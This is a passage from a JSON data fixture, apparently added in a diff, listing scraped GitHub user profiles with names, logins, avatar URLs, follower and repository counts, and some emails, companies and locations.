0, + "followers_count": 24, + "public_gists_count": 1, + "public_repositories_count": 23, + "created_at": "2013-08-12T09:18:28Z", + "updated_at": "2024-05-28T17:15:48Z", + "node_id": "MDQ6VXNlcjUyMTI0MDI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1944, + "fields": { + "nest_created_at": "2024-09-12T00:31:11.471Z", + "nest_updated_at": "2024-09-12T00:31:11.471Z", + "name": "Benedikt Kersjes", + "login": "BenediktKersjes", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7468466?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2014-05-02T16:28:31Z", + "updated_at": "2024-06-26T06:01:05Z", + "node_id": "MDQ6VXNlcjc0Njg0NjY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1945, + "fields": { + "nest_created_at": "2024-09-12T00:31:12.682Z", + "nest_updated_at": "2024-09-12T00:31:12.682Z", + "name": "Leon Teale", + "login": "leonteale", + "email": "leonteale89@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3170212?v=4", + "company": "IT Governance", + "location": "Lytham, Saint Anne's", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 119, + "public_gists_count": 1, + "public_repositories_count": 32, + "created_at": "2013-01-02T15:38:04Z", + "updated_at": "2024-06-06T08:24:45Z", + "node_id": "MDQ6VXNlcjMxNzAyMTI=", + "bio": "Senior Penetration Tester", + "is_hireable": true, + "twitter_username": "leonteale" + } +}, +{ + "model": "github.user", + "pk": 1946, + "fields": { + "nest_created_at": "2024-09-12T00:31:13.911Z", + "nest_updated_at": "2024-09-12T00:31:13.911Z", + "name": "Yesh AJ", + "login": "Yesh-AJ-006", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13846269?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2015-08-18T06:32:47Z", + "updated_at": "2023-10-29T09:51:32Z", + "node_id": "MDQ6VXNlcjEzODQ2MjY5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1947, + "fields": { + "nest_created_at": "2024-09-12T00:31:15.933Z", + "nest_updated_at": "2024-09-12T00:31:15.933Z", + "name": "", + "login": "Sofaobra", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/27997412?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-04-25T08:24:38Z", + "updated_at": "2023-07-11T15:29:08Z", + "node_id": "MDQ6VXNlcjI3OTk3NDEy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1948, + "fields": { + "nest_created_at": "2024-09-12T00:31:17.146Z", + "nest_updated_at": "2024-09-12T00:31:17.146Z", + "name": "Eric Fenderbosch", + "login": "efenderbosch-atg", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/135175651?v=4", + "company": "", + "location": "Akron, OH", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2023-05-31T21:35:04Z", + "updated_at": "2024-09-05T17:50:19Z", + "node_id": "U_kgDOCA6d4w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1949, + "fields": { + "nest_created_at": "2024-09-12T00:31:19.564Z", + "nest_updated_at": "2024-09-12T00:31:19.564Z", + "name": "", + "login": "peizhenp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/139523857?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-07-14T03:24:20Z", + "updated_at": "2023-07-14T03:24:20Z", + "node_id": "U_kgDOCFD3EQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1950, + "fields": { + "nest_created_at": "2024-09-12T00:31:20.821Z", + "nest_updated_at": "2024-09-12T00:31:20.821Z", + "name": "Jürgen Fast", + "login": "juergen-fast", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24269049?v=4", + "company": "@micromata", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-11-30T10:24:58Z", + "updated_at": "2024-07-29T08:27:28Z", + "node_id": "MDQ6VXNlcjI0MjY5MDQ5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1951, + "fields": { + "nest_created_at": "2024-09-12T00:31:22.071Z", + "nest_updated_at": "2024-09-12T00:31:22.071Z", + "name": "", + "login": "Jayakumar6", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/95211511?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2021-11-29T08:13:50Z", + "updated_at": "2024-08-30T04:22:09Z", + "node_id": "U_kgDOBazP9w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1952, + "fields": { + "nest_created_at": "2024-09-12T00:31:23.276Z", + "nest_updated_at": "2024-09-12T00:31:23.276Z", + "name": "Mandar Pimplapure", + "login": "mandarpimplapure", + "email": "mandarpimplapure@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/16802910?v=4", + "company": "", + "location": "INDIA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 25, + "created_at": "2016-01-20T16:45:54Z", + "updated_at": "2024-08-08T05:55:07Z", + "node_id": "MDQ6VXNlcjE2ODAyOTEw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1953, + "fields": { + "nest_created_at": "2024-09-12T00:31:24.461Z", + "nest_updated_at": "2024-09-12T00:31:24.461Z", + "name": "", + "login": "jowko", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20277750?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2016-07-04T07:37:48Z", + "updated_at": "2024-08-12T11:31:56Z", + "node_id": "MDQ6VXNlcjIwMjc3NzUw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1954, + "fields": { + "nest_created_at": "2024-09-12T00:31:25.727Z", + "nest_updated_at": "2024-09-12T00:31:25.727Z", + "name": "ewilansky", + "login": "ewilansky", + "email": "ewilansky@yahoo.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1431556?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 25, + "created_at": "2012-02-12T20:36:28Z", + "updated_at": "2024-05-23T01:59:11Z", + "node_id": "MDQ6VXNlcjE0MzE1NTY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1955, + "fields": { + "nest_created_at": "2024-09-12T00:31:27.368Z", + "nest_updated_at": "2024-09-12T00:31:27.368Z", + "name": "", + "login": "akash-onedealerlane", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/129958569?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-04-05T12:06:34Z", + "updated_at": "2024-03-05T07:03:19Z", + "node_id": "U_kgDOB78CqQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1956, + "fields": { + "nest_created_at": "2024-09-12T00:31:28.637Z", + "nest_updated_at": "2024-09-12T00:31:28.637Z", + "name": "Tristan Dyer", + "login": "trdyer", + "email": "tristandyer@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6180917?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 3, + "public_repositories_count": 9, + "created_at": "2013-12-13T19:37:06Z", + "updated_at": "2024-07-15T13:36:31Z", + "node_id": "MDQ6VXNlcjYxODA5MTc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1957, + "fields": { + "nest_created_at": "2024-09-12T00:31:29.931Z", + "nest_updated_at": "2024-09-12T00:31:29.931Z", + "name": "Stefan Kip", + "login": "kipusoep", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1866549?v=4", + "company": "WasteVision", + "location": "The Netherlands", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 17, + "public_gists_count": 5, + "public_repositories_count": 34, + "created_at": "2012-06-19T08:13:09Z", + "updated_at": "2024-09-09T08:20:04Z", + "node_id": "MDQ6VXNlcjE4NjY1NDk=", + "bio": "Webdeveloper, back-end minded. Love .NET, MVC, C# and DevOps. MCSA Web Applications, Umbraco Certified Expert, Sitecore 8 certified. Dad of Lani and Bodi.", + "is_hireable": false, + "twitter_username": "kipusoep" + } +}, +{ + "model": "github.user", + "pk": 1958, + "fields": { + "nest_created_at": "2024-09-12T00:31:31.140Z", + "nest_updated_at": "2024-09-12T00:31:31.140Z", + "name": "Louis", + "login": "ESPLouis", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/117521562?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-11-05T12:54:59Z", + "updated_at": "2024-04-07T19:47:42Z", + "node_id": "U_kgDOBwE8mg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1959, + "fields": { + "nest_created_at": "2024-09-12T00:31:32.726Z", + "nest_updated_at": "2024-09-12T00:31:32.726Z", + "name": "", + "login": "karthickm512", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/68647169?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-07-22T12:36:03Z", + "updated_at": "2024-07-09T07:01:26Z", + "node_id": "MDQ6VXNlcjY4NjQ3MTY5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1960, + "fields": { + "nest_created_at": "2024-09-12T00:31:33.959Z", + "nest_updated_at": "2024-09-12T00:31:33.959Z", + "name": "Christoph", + "login": "chrisrueger", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/188422?v=4", + "company": "Synesty GmbH", + "location": "Jena", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 15, + "created_at": "2010-01-23T18:10:38Z", + "updated_at": "2024-09-11T23:52:07Z", + "node_id": "MDQ6VXNlcjE4ODQyMg==", + "bio": "Coder, musician and founder of synesty.com a cloud-app for connecting different APIs and apps.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1961, + "fields": { + "nest_created_at": "2024-09-12T00:31:35.177Z", + "nest_updated_at": "2024-09-12T00:31:35.177Z", + "name": "Pascal Obrist", + "login": "obristp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19670247?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2016-05-31T15:20:28Z", + "updated_at": "2024-09-05T13:06:57Z", + "node_id": "MDQ6VXNlcjE5NjcwMjQ3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1962, + "fields": { + "nest_created_at": "2024-09-12T00:31:36.427Z", + "nest_updated_at": "2024-09-12T00:31:36.427Z", + "name": "", + "login": "jonatiao", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20508631?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2016-07-18T02:46:27Z", + "updated_at": "2024-04-26T13:04:43Z", + "node_id": "MDQ6VXNlcjIwNTA4NjMx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1963, + "fields": { + "nest_created_at": "2024-09-12T00:31:37.655Z", + "nest_updated_at": "2024-09-12T00:31:38.878Z", + "name": "Uwe", + "login": "Uwinator", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16160551?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2015-12-05T01:37:18Z", + "updated_at": "2024-08-27T15:20:26Z", + "node_id": "MDQ6VXNlcjE2MTYwNTUx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1964, + "fields": { + "nest_created_at": "2024-09-12T00:31:40.064Z", + "nest_updated_at": "2024-09-12T00:31:40.064Z", + "name": "", + "login": "dcolak8figures", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/123566838?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-01-25T14:24:26Z", + "updated_at": "2024-08-30T11:54:10Z", + "node_id": "U_kgDOB1169g", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1965, + "fields": { + "nest_created_at": "2024-09-12T00:31:41.251Z", + "nest_updated_at": "2024-09-12T00:31:41.251Z", + "name": "", + "login": "baderdah", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46382227?v=4", + "company": "", + "location": "paris", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2019-01-04T17:45:34Z", + "updated_at": "2024-07-26T13:21:52Z", + "node_id": "MDQ6VXNlcjQ2MzgyMjI3", + "bio": "Full stack engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1966, + "fields": { + "nest_created_at": "2024-09-12T00:31:42.460Z", + "nest_updated_at": "2024-09-12T00:33:52.624Z", + "name": "Prabhakaran Rajendran", + "login": "prabutdr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19872503?v=4", + "company": "", + "location": "Chennai, India", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2016-06-11T11:40:25Z", + "updated_at": "2024-09-02T12:15:48Z", + "node_id": "MDQ6VXNlcjE5ODcyNTAz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1967, + "fields": { + "nest_created_at": "2024-09-12T00:31:45.667Z", + "nest_updated_at": "2024-09-22T18:46:36.327Z", + "name": "adam", + "login": "adam-siklosi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60606607?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-02-03T11:34:51Z", + "updated_at": "2024-01-02T06:42:38Z", + "node_id": "MDQ6VXNlcjYwNjA2NjA3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1968, + "fields": { + "nest_created_at": "2024-09-12T00:31:47.258Z", + "nest_updated_at": "2024-09-12T00:31:47.258Z", + "name": "Scott McGowan", + "login": "scottmcgowan24", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/68561250?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2020-07-20T17:57:46Z", + "updated_at": "2024-04-19T16:41:36Z", + "node_id": "MDQ6VXNlcjY4NTYxMjUw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1969, + "fields": { + "nest_created_at": "2024-09-12T00:31:48.913Z", + "nest_updated_at": "2024-09-12T00:31:48.913Z", + "name": "Sebastian", + "login": "sbszcz", + "email": "sebastian.barszczewski@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2794784?v=4", + "company": "", + "location": "Berlin", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2012-11-14T09:56:40Z", + "updated_at": "2024-09-02T07:34:37Z", + "node_id": "MDQ6VXNlcjI3OTQ3ODQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1970, + "fields": { + "nest_created_at": "2024-09-12T00:31:52.164Z", + "nest_updated_at": "2024-09-12T00:31:52.164Z", + "name": "Priyanka Kadam", + "login": "kadampriyanka1109", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31645495?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-09-05T06:24:49Z", + "updated_at": "2023-09-29T06:23:54Z", + "node_id": "MDQ6VXNlcjMxNjQ1NDk1", + "bio": "Android Developer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1971, + "fields": { + "nest_created_at": "2024-09-12T00:31:54.232Z", + "nest_updated_at": "2024-09-12T00:31:54.232Z", + "name": "Gustavo Martinez", + "login": "gmartinezmirai", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9316125?v=4", + "company": "Mirai Solutions", + "location": "Zurich, Switzerland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-10-20T08:07:03Z", + "updated_at": "2024-08-20T07:46:44Z", + "node_id": "MDQ6VXNlcjkzMTYxMjU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1972, + "fields": { + "nest_created_at": "2024-09-12T00:31:55.460Z", + "nest_updated_at": "2024-09-22T19:43:01.738Z", + "name": "Martin Müller", + "login": "mum-viadee", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39087682?v=4", + "company": "@viadee", + "location": "Münster, Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-05-08T11:24:11Z", + "updated_at": "2024-09-19T07:55:35Z", + "node_id": "MDQ6VXNlcjM5MDg3Njgy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1973, + "fields": { + "nest_created_at": "2024-09-12T00:31:56.670Z", + "nest_updated_at": "2024-09-12T00:31:56.670Z", + "name": "Joe DiPol", + "login": "barchetta", + "email": "joe.dipol@oracle.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6116667?v=4", + "company": "Oracle", + "location": "Santa Clara, CA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 16, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2013-12-05T18:31:38Z", + "updated_at": "2024-08-13T18:43:20Z", + "node_id": "MDQ6VXNlcjYxMTY2Njc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1974, + "fields": { + "nest_created_at": "2024-09-12T00:32:02.801Z", + "nest_updated_at": "2024-09-12T00:32:02.801Z", + "name": "Tina Junold", + "login": "tina-junold", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/300583?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 5, + "public_gists_count": 4, + "public_repositories_count": 39, + "created_at": "2010-06-09T06:30:17Z", + "updated_at": "2024-09-05T14:06:02Z", + "node_id": "MDQ6VXNlcjMwMDU4Mw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1975, + "fields": { + "nest_created_at": "2024-09-12T00:32:04.009Z", + "nest_updated_at": "2024-09-12T00:32:04.010Z", + "name": "Jan", + "login": "ExplodingSalad", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/57450839?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2019-11-06T15:28:22Z", + "updated_at": "2024-08-07T12:05:46Z", + "node_id": "MDQ6VXNlcjU3NDUwODM5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1976, + "fields": { + "nest_created_at": "2024-09-12T00:32:05.222Z", + "nest_updated_at": "2024-09-12T00:32:05.222Z", + "name": "", + "login": "Ryusko13", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/146357315?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-09-28T14:12:09Z", + "updated_at": "2023-10-11T20:47:37Z", + "node_id": "U_kgDOCLk8Qw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1977, + "fields": { + "nest_created_at": "2024-09-12T00:32:06.447Z", + "nest_updated_at": "2024-09-12T00:32:06.447Z", + "name": "", + "login": "SergeS", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1794852?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2012-05-30T18:44:49Z", + "updated_at": "2024-09-10T08:32:21Z", + "node_id": "MDQ6VXNlcjE3OTQ4NTI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1978, + "fields": { + "nest_created_at": "2024-09-12T00:32:08.499Z", + "nest_updated_at": "2024-09-12T00:32:08.499Z", + "name": "Christopher", + "login": "Dekari", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6056948?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2013-11-28T08:03:26Z", + "updated_at": "2024-03-08T10:01:24Z", + "node_id": "MDQ6VXNlcjYwNTY5NDg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1979, + "fields": { + "nest_created_at": "2024-09-12T00:32:09.728Z", + "nest_updated_at": "2024-09-12T00:32:34.926Z", + "name": "", + "login": "creasoft-dag", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/121297210?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-12-23T12:47:36Z", + "updated_at": "2024-05-21T14:56:32Z", + "node_id": "U_kgDOBzrZOg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1980, + "fields": { + "nest_created_at": "2024-09-12T00:32:10.968Z", + "nest_updated_at": "2024-09-12T00:32:10.968Z", + "name": "", + "login": "mikkocc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/147476964?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-10-10T06:01:28Z", + "updated_at": "2023-10-10T06:01:28Z", + "node_id": "U_kgDOCMpR5A", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1981, + "fields": { + "nest_created_at": "2024-09-12T00:32:12.583Z", + "nest_updated_at": "2024-09-12T00:32:12.583Z", + "name": "", + "login": "SMUnlimited", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5180431?v=4", + "company": "", + "location": "England", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2013-08-07T08:04:41Z", + "updated_at": "2024-06-08T18:24:04Z", + "node_id": "MDQ6VXNlcjUxODA0MzE=", + "bio": "Principal Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1982, + "fields": { + "nest_created_at": "2024-09-12T00:32:14.269Z", + "nest_updated_at": "2024-09-12T00:32:14.269Z", + "name": "Kim youngjoon", + "login": "Kim-Young-Joon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/83807464?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2021-05-07T07:05:40Z", + "updated_at": "2024-02-27T07:35:01Z", + "node_id": "MDQ6VXNlcjgzODA3NDY0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1983, + "fields": { + "nest_created_at": "2024-09-12T00:32:15.455Z", + "nest_updated_at": "2024-09-12T00:32:15.455Z", + "name": "Giorgi Adeishvili", + "login": "georgemff", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37007370?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 25, + "created_at": "2018-03-03T02:28:20Z", + "updated_at": "2024-07-25T10:27:55Z", + "node_id": "MDQ6VXNlcjM3MDA3Mzcw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1984, + "fields": { + "nest_created_at": "2024-09-12T00:32:17.919Z", + "nest_updated_at": "2024-09-12T00:32:17.919Z", + "name": "Jakub Jablonski", + "login": "JakubJablonski2-TomTom", + "email": "jakub.jablonski2@tomtom.com", + "avatar_url": "https://avatars.githubusercontent.com/u/511938?v=4", + "company": "@tomtom-international", + "location": "PL", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2010-12-06T18:25:05Z", + "updated_at": "2024-08-12T06:23:32Z", + "node_id": "MDQ6VXNlcjUxMTkzOA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1985, + "fields": { + "nest_created_at": "2024-09-12T00:32:19.957Z", + "nest_updated_at": "2024-09-12T00:32:19.957Z", + "name": "ExNG", + "login": "ExNG", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24767736?v=4", + "company": "", + "location": "Berlin, Germany", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2016-12-25T21:33:33Z", + "updated_at": "2024-09-11T15:58:45Z", + "node_id": "MDQ6VXNlcjI0NzY3NzM2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1986, + "fields": { + "nest_created_at": "2024-09-12T00:32:21.213Z", + "nest_updated_at": "2024-09-12T00:32:21.213Z", + "name": "Joachim Beckers", + "login": "jbeckers", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/379626?v=4", + "company": "", + "location": "Leuven, Belgium", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 24, + "created_at": "2010-08-29T09:56:27Z", + "updated_at": "2024-08-27T07:30:07Z", + "node_id": "MDQ6VXNlcjM3OTYyNg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1987, + "fields": { + "nest_created_at": "2024-09-12T00:32:22.446Z", + "nest_updated_at": "2024-09-12T00:32:22.446Z", + "name": "", + "login": "reynaldiwong", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72689828?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-10-11T10:01:49Z", + "updated_at": "2023-11-28T05:04:35Z", + "node_id": "MDQ6VXNlcjcyNjg5ODI4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1988, + "fields": { + "nest_created_at": "2024-09-12T00:32:24.068Z", + "nest_updated_at": "2024-09-12T00:32:24.068Z", + "name": "Or Cohen", + "login": "orarch", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6950413?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-03-14T10:47:29Z", + "updated_at": "2024-09-11T21:05:00Z", + "node_id": "MDQ6VXNlcjY5NTA0MTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1989, + "fields": { + "nest_created_at": "2024-09-12T00:32:25.298Z", + "nest_updated_at": "2024-09-12T00:32:25.298Z", + "name": "", + "login": "thomasredlin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/107438763?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": 